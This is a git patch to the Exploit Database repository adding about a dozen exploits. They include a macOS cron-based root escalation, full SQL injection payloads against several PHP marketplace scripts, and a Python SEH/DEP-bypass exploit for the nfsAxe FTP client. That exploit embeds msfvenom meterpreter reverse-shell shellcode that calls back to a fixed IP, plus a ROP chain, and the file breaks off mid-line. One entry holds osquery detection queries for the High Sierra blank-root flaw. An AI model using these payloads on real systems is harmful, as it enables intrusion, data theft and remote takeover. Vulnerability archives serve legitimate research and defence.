From c35d9b35f710aab7b9569a1f3549711e3c5bc30f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-09 14 changes to exploits/shellcodes macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free Apple macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free Apple macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption Apple macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free Apple macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash Linux Kernel - DCCP Socket Use-After-Free Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free Apple iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation Apple iOS/macOS - 'xpc_data' Objects Sandbox Escape Privilege Escalation macOS High Sierra - Local Privilege Escalation (Metasploit) Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit) Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass) DomainSale PHP Script 1.0 - 'id' SQL Injection Simple Chatting System 1.0.0 - Arbitrary File Upload Website Auction Marketplace 2.0.5 - 'cat_id' SQL Injection Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection FS Thumbtack Clone 1.0 - 'cat' / 'sc' SQL Injection FS Stackoverflow Clone 1.0 - 'keywords' SQL Injection FS Shutterstock Clone 1.0 - 'keywords' SQL Injection FS Quibids Clone 1.0 - SQL Injection FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection --- exploits/macos/local/43247.md | 19 +++++ exploits/macos/local/43248.md | 16 +++++ exploits/php/webapps/43102.txt | 1 + exploits/php/webapps/43235.txt | 29 ++++++++ exploits/php/webapps/43237.txt | 27 ++++++++ exploits/php/webapps/43238.txt | 29 ++++++++ exploits/php/webapps/43239.txt | 29 ++++++++ exploits/php/webapps/43240.txt | 37 ++++++++++ exploits/php/webapps/43241.txt | 30 ++++++++ exploits/php/webapps/43242.txt | 30 ++++++++ exploits/php/webapps/43243.txt | 30 ++++++++ exploits/php/webapps/43244.txt | 36 ++++++++++ exploits/php/webapps/43245.txt | 28 ++++++++ exploits/windows/remote/43236.py | 115 +++++++++++++++++++++++++++++++ files_exploits.csv | 37 ++++++---- 15 files changed, 481 insertions(+), 12 deletions(-) create mode 100644 exploits/macos/local/43247.md create mode 100644 exploits/macos/local/43248.md create mode 100644 exploits/php/webapps/43235.txt create mode 100644 exploits/php/webapps/43237.txt create mode 100644 exploits/php/webapps/43238.txt create mode 100644 exploits/php/webapps/43239.txt create mode 100644 exploits/php/webapps/43240.txt create mode 100644 exploits/php/webapps/43241.txt create mode 100644 exploits/php/webapps/43242.txt create mode 100644 exploits/php/webapps/43243.txt create mode 100644 exploits/php/webapps/43244.txt create mode 100644 exploits/php/webapps/43245.txt create mode 100755 exploits/windows/remote/43236.py diff --git a/exploits/macos/local/43247.md b/exploits/macos/local/43247.md new file mode 100644 index 000000000..32663b68f --- /dev/null +++ b/exploits/macos/local/43247.md @@ -0,0 +1,19 @@ +Recently I was working on an security issue in some other software that has yet to be disclosed which created a rather interesting condition. As a non-root user I was able to write to any file on the system that was not SIP-protected but the resulting file would not be root-owned, even if it previously was. + +This presented an interesting challenge for privilege escalation - how would you exploit this to obtain root access? The obvious first attempt was the sudoers file but sudo is smart enough not to process it if the file isn't root-owned so that didn't work. + +I then discovered (after a tip from a friend - thanks pndc!) that the cron system in macOS does not care who the crontab files are owned by. Getting root was a simple case of creating a crontab file at: + +``` +/var/at/tabs/root +``` + +with a 60-second cron line, eg: + +``` +* * * * * chown root:wheel /tmp/payload && chmod 4755 /tmp/payload +``` + +and then waiting for it to execute. It's not clear if this is a macOS-specific issue or a hangover from the BSD-inherited cron system, I suspect the latter. + +The issue has been reported to Apple so hopefully they will fix it. \ No newline at end of file diff --git a/exploits/macos/local/43248.md b/exploits/macos/local/43248.md new file mode 100644 index 000000000..13de97f16 --- /dev/null +++ b/exploits/macos/local/43248.md @@ -0,0 +1,16 @@ +## Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235 +"Dear @AppleSupport, we noticed a *HUGE* security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware of it @Apple?" + + +## Proof: https://twitter.com/patrickwardle/status/935608904377077761 + + +## Mitigation/Detection/Forensic: https://news.ycombinator.com/item?id=15800676 +- Can be mitigated by enabling the root user with a strong password +- Can be detected with `osquery` using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;";` +- You can see what time the root account was enabled using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" WHERE key = "accountPolicyData";` then base 64 decoding that into a file and then running `plutil -convert xml1` and looking at the `passwordLastSetTime` field. +_Note: osquery needs to be running with `sudo` but if you have it deployed across a fleet of macs as a daemon then it will be running with `sudo` anyway._ +_Note: You can get the same info with plutil(1): `$ sudo plutil -p /private/var/db/dslocal/nodes/Default/users/root.plist`_ + + +## Security Advisory: https://support.apple.com/en-gb/HT208315 \ No newline at end of file diff --git a/exploits/php/webapps/43102.txt b/exploits/php/webapps/43102.txt index 4bc47379a..a32b63c50 100644 --- a/exploits/php/webapps/43102.txt +++ b/exploits/php/webapps/43102.txt @@ -21,6 +21,7 @@ # Proof of Concept: # # http://localhost/[PATH]/my_profile.php +# http://localhost/[PATH]/view/teacher_profile2.php # http://localhost/[PATH]/uploads/[FILE] # # Etc.. diff --git a/exploits/php/webapps/43235.txt b/exploits/php/webapps/43235.txt new file mode 100644 index 000000000..89e838517 --- /dev/null +++ b/exploits/php/webapps/43235.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.codester.com/ChewiScripts +# Software Link: https://www.codester.com/items/5301/domainsale-php-script +# Demo: http://chewiscripts.x10host.com/domain/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/domain.php?id=[SQL] +# +# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43237.txt b/exploits/php/webapps/43237.txt new file mode 100644 index 000000000..6a5e23123 --- /dev/null +++ b/exploits/php/webapps/43237.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Simple Chatting System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: http://yourphpscript.com/ +# Software Link: http://yourphpscript.com/index.php/product/simple-chatting-system-php-ajax-mysql-javascript/ +# Demo: http://chat.yourphpscript.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker upload arbitrary file.... +# +# Proof of Concept: +# +# Users profile picture arbitrary file can be uploaded .. +# +# http://localhost/[PATH]/view/my_profile.php +# http://localhost/[PATH]/uploads/[DATE].php +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43238.txt b/exploits/php/webapps/43238.txt new file mode 100644 index 000000000..50d88b39e --- /dev/null +++ b/exploits/php/webapps/43238.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://flippa-clone.com/ +# Software Link: https://flippa-clone.com/ +# Demo: https://demo.flippa-clone.com/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search.php?cat_id=[SQL] +# +# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43239.txt b/exploits/php/webapps/43239.txt new file mode 100644 index 000000000..7da6e61ea --- /dev/null +++ b/exploits/php/webapps/43239.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/ +# Demo: http://thavasu.com/demo/crowdfunding/ +# Version: 2.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-cause.php?pid=[SQL] +# +# -23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# http://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43240.txt b/exploits/php/webapps/43240.txt new file mode 100644 index 000000000..51a1c75e0 --- /dev/null +++ b/exploits/php/webapps/43240.txt @@ -0,0 +1,37 @@ +# # # # # +# Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/thumbtack-clone/ +# Demo: http://thumbtack-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/browse-category.php?cat=[SQL] +# +# -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# +# 2) +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43241.txt b/exploits/php/webapps/43241.txt new file mode 100644 index 000000000..b21f559bb --- /dev/null +++ b/exploits/php/webapps/43241.txt @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43242.txt b/exploits/php/webapps/43242.txt new file mode 100644 index 000000000..540a0bfe9 --- /dev/null +++ b/exploits/php/webapps/43242.txt @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43243.txt b/exploits/php/webapps/43243.txt new file mode 100644 index 000000000..46f044887 --- /dev/null +++ b/exploits/php/webapps/43243.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: FS Quibids Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/quibids-clone/ +# Demo: http://quibids-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/itechd.php?productid=[SQL] +# +# Parameter: productid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: productid=609 AND 2165=2165 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43244.txt b/exploits/php/webapps/43244.txt new file mode 100644 index 000000000..eaca1106d --- /dev/null +++ b/exploits/php/webapps/43244.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Olx Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/olx-clone/ +# Demo: http://olx-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/subpage.php?scat=[SQL] +# +# 51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# http://server/subpage.php?scat=51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# 2) +# http://localhost/[PATH]/message.php?pid=[SQL] +# +# -1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# view-source:http://server/message.php?pid=-1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43245.txt b/exploits/php/webapps/43245.txt new file mode 100644 index 000000000..7f06f657c --- /dev/null +++ b/exploits/php/webapps/43245.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: FS Monster Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/monster-clone/ +# Demo: http://monster-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/Employer_Details.php?id=[SQL] +# +# -3'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/remote/43236.py b/exploits/windows/remote/43236.py new file mode 100755 index 000000000..a6664e2dc --- /dev/null +++ b/exploits/windows/remote/43236.py @@ -0,0 +1,115 @@ +#!/usr/bin/env python +# +# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass) +# Date : 12/8/2017 +# Exploit Author : wetw0rk +# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html +# Software link : http://www.labf.com/download/nfsaxe.exe +# Version : 3.7 +# Tested on : Windows 7 (x86) +# Description : Upon connection the victim is sent a specially crafted buffer +# overwriting the SEH record, resulting in code execution. +# +# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly) +# +# Trigger the vulnerability by : +# Login as -> [check] anonymous -> connect +# + +import struct, socket + +host = "0.0.0.0" +port = 21 + +# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp +# -f python -b "\x00\x0a\x10" -v shellcode --smallest +shellcode = "" +shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1" +shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" +shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" +shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" +shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" +shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" +shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" +shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" +shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" +shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" +shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" +shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" +shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" +shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" +shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" +shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7" +shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f" +shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a" +shellcode += "\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" +shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" +shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf" +shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5" +shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52" +shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f" +shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda" + +def create_rop_chain(): + # https://www.corelan.be/index.php/security/corelan-ropdb/ + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN + 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) + 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] + 0x7c3415a2, # JMP [EAX] [msvcr71.dll] + 0xffffffff, # + 0x7c376402, # skip 4 bytes [msvcr71.dll] + 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] + 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] + 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] + 0x7c344f87, # POP EDX # RETN [msvcr71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] + 0x7c34d201, # POP ECX # RETN [msvcr71.dll] + 0x7c38b001, # &Writable location [msvcr71.dll] + 0x7c347f97, # POP EAX # RETN [msvcr71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] + 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] + ] + return ''.join(struct.pack('